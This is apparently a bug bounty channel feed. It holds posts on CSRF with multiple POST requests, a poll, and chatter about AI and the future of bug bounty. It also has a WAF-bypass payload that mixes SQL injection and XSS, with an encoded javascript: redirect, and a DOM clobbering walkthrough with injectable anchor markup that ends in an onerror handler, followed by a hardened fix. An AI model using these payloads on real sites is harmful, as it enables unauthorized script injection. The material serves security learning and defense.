https://gist.github.com/MEY-D/14e3a6449b340a8a2122d5e2b2ad662a
It’s a known technique, but it might still be useful.
Gist: CSRF Multiple POST requests
BugBounty & Hacking Resources
For when you need the victim to send several POST requests
without leaving the attacker's site (and with one click)
So many bug bounty and security channels have popped up 😂
Instead of these bullshit Telegram channels (also here), go follow the foreign folks on Twitter
You won't find anything special here 😄
Interesting way to bypass WAF when you need to use the </noscript> tag:
meydi" or 1=/*</noscript>*/ -- - <XSS>
The WAF first checks for SQLi, so it ignores the comment section.
e.g.:
meydi" or 1=/*</noscript>*/ -- - x=/*<details open=\" ontoggle=x=atob;z=x`amF2YXNjcmlwdDphbGVydChvcmlnaW4p`;location=z */>
Inspired by: https://x.com/_0x999?s=21
https://x.com/neotrony/status/1931790830336884973?s=2
Let us know whether the stories posted so far have been good or not 👊
Anonymous Poll
82% Great, keep going 🦍 🤣 ….
18% Seriously, don't continue ….☺️
https://x.com/zseano/status/1932719746538996157?s=61
zseano (@zseano) on X: @rez0__ “bug bounty as we know it probably dies.”
Couldn’t have said it better myself tbh. Although I think we are 3-5 years away from this. People doing bug bounties full time should be planning for the future (I know I am)
How badly did this news scare the crap out of you? 🦍
my personal opinion:
This applies to every field, not just bug bounty
and in my opinion cyber security as a whole will be among the last to go
Either way, use this window to work 10x 🫦
edit:
and I agree with zseano about the timeline 😬
This is how DOM clobbering works.
When you create an element with an id, the browser automatically creates a global variable for that ID:
<a id="foo"></a>
Now window.foo points to that single element.
But when you create multiple elements with the same id:
<a id="foo"></a>
<a id="foo"></a>
Now window.foo becomes an HTMLCollection, not a single element.
Add a name attribute:
<a id="foo" name="bar" href="..."></a>
And window.foo.bar now points to that element (works in Chromium/WebKit browsers, but not Firefox).
Now combine that with a common JS pattern like:
var someObject = window.someObject || {};
This is meant to provide a fallback if the global doesn't exist. However, if window.someObject has been clobbered by injected HTML, the fallback silently trusts a DOM object instead of a real JS object.
Now imagine this JS logic:
let imgSrc = someObject.avatar;
If an attacker clobbered someObject.avatar with:
<a id=someObject></a>
<a id=someObject name=avatar href='cid:"onerror=alert(1)//'></a>
and the HTML is set via innerHTML or similar, then this could render as:
<img src="cid:" onerror="alert(1)//"">
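The following is an added example, not code from the post above: it puts the vulnerable `window.someObject || {}` fallback next to a hardened version and shows why the clobbered anchor ends up in the markup. Node has no DOM, so ClobberedAnchor and clobberedWindow() are stand-ins (assumptions of this example) for what a browser creates from the two injected <a id=someObject> tags: an HTMLCollection whose named property avatar is the second anchor, and an anchor whose string form is its href. The payload uses cid: because that URL has an opaque path, where the URL parser leaves the double quote unencoded; with an http: URL the quote would be percent-encoded and the attribute breakout would fail.

```javascript
// Added example (not from the original post). Node has no DOM, so the two
// helpers below stand in for what the browser creates from the injected HTML
//   <a id=someObject></a>
//   <a id=someObject name=avatar href='cid:"onerror=alert(1)//'></a>
// In a browser you would assign that markup via innerHTML and pass the real
// `window` instead of clobberedWindow().

// HTMLAnchorElement's stringifier returns its href, which is why an anchor
// survives string concatenation as a URL rather than as "[object Object]".
class ClobberedAnchor {
  constructor(href) { this.href = href; }
  toString() { return this.href; }
}

// Stand-in for the globals after parsing: two elements sharing an id make
// window.someObject an HTMLCollection, and the name attribute of the second
// exposes it as window.someObject.avatar (named access on the collection).
function clobberedWindow(href) {
  const collection = [new ClobberedAnchor(''), new ClobberedAnchor(href)];
  collection.avatar = collection[1];
  return { someObject: collection };
}

// Vulnerable pattern from the post: trust whatever the global is, then build
// the <img> by concatenation. With the payload above this returns
// <img src="cid:"onerror=alert(1)//">, which the HTML parser reads as an
// onerror attribute.
function renderAvatarVulnerable(win) {
  const someObject = win.someObject || {};
  const imgSrc = someObject.avatar;
  return '<img src="' + imgSrc + '">';
}

// Fix 1: accept only a plain object as configuration. Elements and
// HTMLCollections have their own prototypes, so a clobbered global fails here.
function isPlainObject(v) {
  return v !== null && typeof v === 'object' &&
    Object.getPrototypeOf(v) === Object.prototype;
}

// Fix 2: never splice untrusted strings into markup unescaped. In a browser
// prefer img.setAttribute('src', url); this escaper covers the
// string-building case the post describes.
function escapeAttr(s) {
  const map = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;' };
  return String(s).replace(/[&<>"']/g, c => map[c]);
}

// Hardened version: type-check the global, type-check the field, escape the value.
function renderAvatarHardened(win, defaults = { avatar: '/img/default.png' }) {
  const someObject = isPlainObject(win.someObject) ? win.someObject : defaults;
  const imgSrc = typeof someObject.avatar === 'string' ? someObject.avatar : defaults.avatar;
  return '<img src="' + escapeAttr(imgSrc) + '">';
}

// Constructed input: the href from the post's payload.
const payloadHref = 'cid:"onerror=alert(1)//';
console.log('vulnerable:', renderAvatarVulnerable(clobberedWindow(payloadHref)));
console.log('hardened:  ', renderAvatarHardened(clobberedWindow(payloadHref)));
console.log('legit:     ', renderAvatarHardened({ someObject: { avatar: 'https://example.invalid/a.png' } }));
```

The prototype check is deliberately strict: a configuration object created in another frame has a different Object.prototype and would also be rejected, so use it where the config is defined in the same script, and pair it with the escaping (or property assignment) so that a clobbered value can never reach markup even if the guard is bypassed.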
